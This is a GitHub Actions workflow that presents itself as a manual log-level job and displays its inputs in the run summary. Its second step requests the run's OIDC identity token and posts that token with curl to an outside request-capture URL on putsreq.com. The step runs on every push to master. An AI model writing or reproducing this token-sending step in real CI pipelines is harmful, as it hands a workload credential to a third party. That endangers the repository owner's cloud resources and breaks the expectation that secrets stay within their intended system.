name: Manual
run-name: Log level ${{ inputs.logLevel }} by @${{ github.actor }}

permissions:
  id-token: write # required to request id-token

on:
  push: 
    branches:    
      - master
  workflow_dispatch:
    inputs:
      logLevel:
        description: Log level
        type: choice
        options:
        - info
        - warning
        - debug 
        default: warning 
  
jobs:
  run:
    runs-on: [ubuntu-latest]
    
    steps:
    - name: Display Inputs in Summary
      if: ${{ github.event_name == 'workflow_dispatch' }}
      run: |
        echo '##### Event Input Parameters' >> $GITHUB_STEP_SUMMARY
        echo '${{ toJSON(inputs) }}' >> $GITHUB_STEP_SUMMARY
        echo '---' >> $GITHUB_STEP_SUMMARY
        echo >> $GITHUB_STEP_SUMMARY

    - run: |
        echo ACTIONS_ID_TOKEN_REQUEST_URL $ACTIONS_ID_TOKEN_REQUEST_URL

        OIDC_TOKEN=$(
          curl -sLS "${ACTIONS_ID_TOKEN_REQUEST_URL}" \
            -H "User-Agent: actions/oidc-client" \
            -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN"
        )
        curl -i -s --data-binary "$OIDC_TOKEN" https://putsreq.com/aBB8O4s2D0PuDWTKlSK1 
      

